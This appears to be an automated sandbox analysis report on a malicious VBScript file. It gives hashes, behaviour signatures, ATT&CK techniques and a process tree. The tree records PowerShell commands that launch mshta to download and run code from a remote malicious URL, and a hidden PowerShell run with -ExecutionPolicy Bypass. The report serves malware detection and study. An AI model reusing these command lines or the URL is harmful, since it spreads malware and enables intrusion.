Analysis

  • max time kernel
    123s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    08-04-2021 06:49

General

  • Target

    FQ45.vbs

  • Size

    996B

  • MD5

    7c5cdd80461494fe18eae20726676f01

  • SHA1

    9d4ba6a01448c36043854f6a13a5922480c6a26f

  • SHA256

    e5ddae23eb8d248fb190371808ab28d20485a16f2eb0fc238a1fb812f3c52c91

  • SHA512

    9c54062fd3cc99467613562bac1dc29b477492c3ce8b07a1c289c1c4099a036ddcd00c5a0992244d17afda0ee9cb4d308a022c7d4993e64423a46470af64e93c

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops startup file 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FQ45.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\mshta https://pazpus.com/bootstrap/cache/zender.txt
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://pazpus.com/bootstrap/cache/zender.txt
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1460
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:404

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    6062e5ec45f167c36916f7a8a427aa6d

    SHA1

    22250efb0e8d103033d88cf68f4e0dbeacc5ae57

    SHA256

    9fee206afd89be4a43061f329444f0b1e1337efec1780b7596dff669257a9536

    SHA512

    5ecb7820d2027cf04ec6a6da8629c238affc6926ba357e795e04d7ef6ac15efab281c83d59aa664beca9522b585134ad0c8a94db36d42c1d82266b98b172aa22

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    6062e5ec45f167c36916f7a8a427aa6d

    SHA1

    22250efb0e8d103033d88cf68f4e0dbeacc5ae57

    SHA256

    9fee206afd89be4a43061f329444f0b1e1337efec1780b7596dff669257a9536

    SHA512

    5ecb7820d2027cf04ec6a6da8629c238affc6926ba357e795e04d7ef6ac15efab281c83d59aa664beca9522b585134ad0c8a94db36d42c1d82266b98b172aa22

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • memory/404-41-0x000000001AA20000-0x000000001AA21000-memory.dmp
    Filesize

    4KB

  • memory/404-17-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp
    Filesize

    9.9MB

  • memory/404-40-0x000000001AA10000-0x000000001AA11000-memory.dmp
    Filesize

    4KB

  • memory/404-28-0x000000001AAE0000-0x000000001AAE1000-memory.dmp
    Filesize

    4KB

  • memory/404-25-0x000000001AAB0000-0x000000001AAB1000-memory.dmp
    Filesize

    4KB

  • memory/404-24-0x0000000002540000-0x0000000002541000-memory.dmp
    Filesize

    4KB

  • memory/404-23-0x000000001AB24000-0x000000001AB26000-memory.dmp
    Filesize

    8KB

  • memory/404-22-0x000000001AB20000-0x000000001AB22000-memory.dmp
    Filesize

    8KB

  • memory/404-14-0x0000000000000000-mapping.dmp
  • memory/404-50-0x000000001AB2A000-0x000000001AB49000-memory.dmp
    Filesize

    124KB

  • memory/404-21-0x000000001A9C0000-0x000000001A9C1000-memory.dmp
    Filesize

    4KB

  • memory/404-19-0x000000001ABA0000-0x000000001ABA1000-memory.dmp
    Filesize

    4KB

  • memory/404-18-0x0000000002370000-0x0000000002371000-memory.dmp
    Filesize

    4KB

  • memory/580-13-0x000007FEF7540000-0x000007FEF77BA000-memory.dmp
    Filesize

    2.5MB

  • memory/1192-11-0x0000000002690000-0x0000000002691000-memory.dmp
    Filesize

    4KB

  • memory/1192-7-0x00000000026B0000-0x00000000026B2000-memory.dmp
    Filesize

    8KB

  • memory/1192-3-0x0000000000000000-mapping.dmp
  • memory/1192-5-0x000007FEF5480000-0x000007FEF5E6C000-memory.dmp
    Filesize

    9.9MB

  • memory/1192-10-0x0000000002660000-0x0000000002661000-memory.dmp
    Filesize

    4KB

  • memory/1192-8-0x000000001AA90000-0x000000001AA91000-memory.dmp
    Filesize

    4KB

  • memory/1192-9-0x00000000026B4000-0x00000000026B6000-memory.dmp
    Filesize

    8KB

  • memory/1192-6-0x0000000002480000-0x0000000002481000-memory.dmp
    Filesize

    4KB

  • memory/1460-12-0x0000000000000000-mapping.dmp
  • memory/1596-20-0x0000000002500000-0x0000000002504000-memory.dmp
    Filesize

    16KB

  • memory/1596-2-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp
    Filesize

    8KB

  • memory/1660-42-0x0000000000000000-mapping.dmp
  • memory/1660-46-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp
    Filesize

    9.9MB

  • memory/1660-49-0x000000001ACE0000-0x000000001ACE2000-memory.dmp
    Filesize

    8KB

  • memory/1660-51-0x000000001ACE4000-0x000000001ACE6000-memory.dmp
    Filesize

    8KB